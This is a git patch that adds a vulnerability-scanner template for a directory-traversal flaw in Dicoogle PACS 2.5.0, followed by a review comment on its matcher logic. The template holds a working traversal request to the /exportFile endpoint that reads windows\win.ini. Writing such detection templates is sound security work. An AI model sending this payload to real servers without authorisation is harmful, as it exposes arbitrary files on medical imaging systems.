From 439a1e966a4e83e52c30ac7fbe202b4833b47c97 Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Fri, 24 Dec 2021 08:57:26 +0900
Subject: [PATCH] Create dicoogle-pacs-lfi.yaml
---
 dicoogle-pacs-lfi.yaml | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 dicoogle-pacs-lfi.yaml
diff --git a/dicoogle-pacs-lfi.yaml b/dicoogle-pacs-lfi.yaml
new file mode 100644
index 0000000000..8f38c36ece
--- /dev/null
+++ b/dicoogle-pacs-lfi.yaml
@@ -0,0 +1,24 @@
+id: dicoogle-pacs-lfi
+
+info:
+ name: Dicoogle PACS 2.5.0 - Directory Traversal
+ author: 0x_akoko
+ severity: high
+ description: In version 2.5.0, it is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren't required.
+ reference: https://cxsecurity.com/issue/WLB-2018070131
+ tags: windows,lfi,dicoogle
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"
+
+ stop-at-first-match: true
+ matchers:
+ - type: word
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
+ part: body
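Review bot: The `matchers` block decides on body words alone, so a response of any status that contains "bit app support", "fonts" and "extensions" (an error page or a document that quotes win.ini, for example) is reported as a high-severity finding. Pairing the word matcher with a status matcher under `matchers-condition: and` narrows that, assuming the export endpoint answers 200 on a successful read, which should be confirmed against a known-affected instance. `stop-at-first-match: true` has no effect with a single entry under `path` and can be dropped. The check only recognises a Windows host (backslash traversal to win.ini), so the `description` should say so and name the product, so that a non-match on another platform is not read as "not vulnerable". The indentation below follows the usual template layout.

```yaml
    matchers-condition: and
    matchers:
      # … unchanged: word matcher on the three win.ini markers …
      - type: status
        status:
          - 200
```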